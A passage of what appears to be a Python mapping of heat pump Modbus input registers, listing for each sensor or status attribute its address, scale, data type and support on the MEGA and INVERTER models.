{ KEY_ADDRESS: 17, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SYSTEM_SUPPLY_LINE_CALCULATED_SET_POINT:
{ KEY_ADDRESS: 18, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SELECTED_HEAT_CURVE:
{ KEY_ADDRESS: 19, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_1:
{ KEY_ADDRESS: 20, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_2:
{ KEY_ADDRESS: 21, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_3:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_4:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_5:
{ KEY_ADDRESS: 24, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_6:
{ KEY_ADDRESS: 25, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEAT_CURVE_X_COORDINATE_7:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COOLING_SEASON_INTEGRAL_VALUE:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_CONDENSER_CIRCULATION_PUMP_SPEED:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_1_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BUFFER_TANK_TEMPERATURE:
{ KEY_ADDRESS: 41, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_1_POSITION:
{ KEY_ADDRESS: 43, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BRINE_CIRCULATION_PUMP_SPEED:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HGW_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_HOT_WATER_DIRECTIONAL_VALVE_POSITION:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COMPRESSOR_OPERATING_HOURS:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TAP_WATER_OPERATING_HOURS:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_EXTERNAL_ADDITIONAL_HEATER_OPERATING_HOURS:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_SPEED_PERCENT:
{ KEY_ADDRESS: 54, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SECOND_PRIORITISED_DEMAND:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_THIRD_PRIORITISED_DEMAND:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SOFTWARE_VERSION_MAJOR:
{ KEY_ADDRESS: 57, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SOFTWARE_VERSION_MINOR:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SOFTWARE_VERSION_MICRO:
{ KEY_ADDRESS: 59, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_TEMPORARILY_BLOCKED:
{ KEY_ADDRESS: 60, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COMPRESSOR_CURRENT_GEAR:
{ KEY_ADDRESS: 61, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_FIRST_PRIORITY:
{ KEY_ADDRESS: 62, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_SECOND_PRIORITY:
{ KEY_ADDRESS: 63, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_THIRD_PRIORITY:
{ KEY_ADDRESS: 64, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_FOURTH_PRIORITY:
{ KEY_ADDRESS: 65, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_QUEUED_DEMAND_FIFTH_PRIORITY:
{ KEY_ADDRESS: 66, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_STATUS, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_INTERNAL_ADDITIONAL_HEATER_CURRENT_STEP:
{ KEY_ADDRESS: 67, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_BUFFER_TANK_CHARGE_SET_POINT:
{ KEY_ADDRESS: 68, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_CURRENT:
{ KEY_ADDRESS: 69, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_CURRENT:
{ KEY_ADDRESS: 70, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_CURRENT:
{ KEY_ADDRESS: 71, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_0_VOLTAGE:
{ KEY_ADDRESS: 72, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_0_VOLTAGE:
{ KEY_ADDRESS: 73, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_0_VOLTAGE:
{ KEY_ADDRESS: 74, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_L2_VOLTAGE:
{ KEY_ADDRESS: 75, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_L3_VOLTAGE:
{ KEY_ADDRESS: 76, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_L1_VOLTAGE:
{ KEY_ADDRESS: 77, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L1_POWER:
{ KEY_ADDRESS: 78, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L2_POWER:
{ KEY_ADDRESS: 79, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_L3_POWER:
{ KEY_ADDRESS: 80, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_METER_VALUE:
{ KEY_ADDRESS: 81, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_COMFORT_MODE:
{ KEY_ADDRESS: 82, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_ELECTRIC_METER_KWH_TOTAL:
{ KEY_ADDRESS: 83, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_LONG, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_INPUT_WCS_VALVE_POSITION:
{ KEY_ADDRESS: 85, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_TWC_VALVE_POSITION:
{ KEY_ADDRESS: 86, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_2_POSITION:
{ KEY_ADDRESS: 87, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_3_POSITION:
{ KEY_ADDRESS: 88, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_4_POSITION:
{ KEY_ADDRESS: 89, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_5_POSITION:
{ KEY_ADDRESS: 90, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DEW_POINT_ROOM:
{ KEY_ADDRESS: 91, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_SUPPLY_LINE_MIX_VALVE_POSITION:
{ KEY_ADDRESS: 92, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_SURPLUS_HEAT_FAN_SPEED:
{ KEY_ADDRESS: 93, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_POOL_SUPPLY_LINE_MIX_VALVE_POSITION:
{ KEY_ADDRESS: 94, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TWC_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 95, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_TWC_RETURN_TEMPERATURE:
{ KEY_ADDRESS: 96, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_WCS_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 97, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_TWC_END_TANK_TEMPERATURE:
{ KEY_ADDRESS: 98, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_2_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 99, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_3_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 100, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_4_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 101, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_COOLING_CIRCUIT_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 103, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_TANK_TEMPERATURE:
{ KEY_ADDRESS: 104, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_TANK_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 105, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_COOLING_CIRCUIT_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 106, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_MIX_VALVE_5_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 107, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_2_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 109, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_3_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 111, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_4_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 113, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_5_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 115, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SURPLUS_HEAT_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 117, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_SURPLUS_HEAT_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 118, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_POOL_SUPPLY_LINE_TEMPERATURE:
{ KEY_ADDRESS: 119, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_POOL_RETURN_LINE_TEMPERATURE:
{ KEY_ADDRESS: 120, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_ROOM_TEMPERATURE_SENSOR:
{ KEY_ADDRESS: 121, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 10, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_BUBBLE_POINT:
{ KEY_ADDRESS: 122, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DEW_POINT:
{ KEY_ADDRESS: 124, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SUPERHEAT_TEMPERATURE:
{ KEY_ADDRESS: 125, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SUB_COOLING_TEMPERATURE:
{ KEY_ADDRESS: 126, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_LOW_PRESSURE_SIDE:
{ KEY_ADDRESS: 127, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HIGH_PRESSURE_SIDE:
{ KEY_ADDRESS: 128, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_LIQUID_LINE_TEMPERATURE:
{ KEY_ADDRESS: 129, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_SUCTION_GAS_TEMPERATURE:
{ KEY_ADDRESS: 130, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_HEATING_SEASON_INTEGRAL_VALUE:
{ KEY_ADDRESS: 131, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_P_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION:
{ KEY_ADDRESS: 132, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_I_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION:
{ KEY_ADDRESS: 133, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_D_VALUE_FOR_GEAR_SHIFTING_AND_DEMAND_CALCULATION:
{ KEY_ADDRESS: 134, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_I_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK:
{ KEY_ADDRESS: 135, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_P_VALUE_FOR_COMPRESSOR_ON_OFF_BUFFER_TANK:
{ KEY_ADDRESS: 136, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MIX_VALVE_COOLING_OPENING_DEGREE:
{ KEY_ADDRESS: 137, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_TAP_WATER:
{ KEY_ADDRESS: 139, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_HEATING:
{ KEY_ADDRESS: 140, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_COOLING:
{ KEY_ADDRESS: 141, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_GEAR_FOR_POOL:
{ KEY_ADDRESS: 142, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_GENESIS:
{ KEY_ADDRESS: 143, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_NUMBER_OF_AVAILABLE_SECONDARIES_LEGACY:
{ KEY_ADDRESS: 144, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_TOTAL_DISTRIBUTED_GEARS_TO_ALL_UNITS:
{ KEY_ADDRESS: 145, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_MAXIMUM_GEAR_OUT_OF_ALL_THE_CURRENTLY_REQUESTED_GEARS:
{ KEY_ADDRESS: 146, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_1:
{ KEY_ADDRESS: 147, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_2:
{ KEY_ADDRESS: 148, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_3:
{ KEY_ADDRESS: 149, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_4:
{ KEY_ADDRESS: 150, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DESIRED_TEMPERATURE_DISTRIBUTION_CIRCUIT_MIX_VALVE_5:
{ KEY_ADDRESS: 151, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 100, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_INPUT_DISCONNECT_HOT_GAS_END_TANK:
{ KEY_ADDRESS: 152, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_COMPRESSOR_RUNNING:
{ KEY_ADDRESS: 153, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_REPORTING_ALARM:
{ KEY_ADDRESS: 154, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_START_SIGNAL:
{ KEY_ADDRESS: 155, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_LEGACY_HEAT_PUMP_TAP_WATER_SIGNAL:
{ KEY_ADDRESS: 156, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_COMBINED_OUTPUT_OF_ALL_CLASS_D_ALARMS:
{ KEY_ADDRESS: 160, KEY_REG_TYPE: REG_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_INT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_INPUT_PRIMARY_UNIT_ALARM_PRIMARY_UNIT_HAS_LOST_COMMUNICATION:
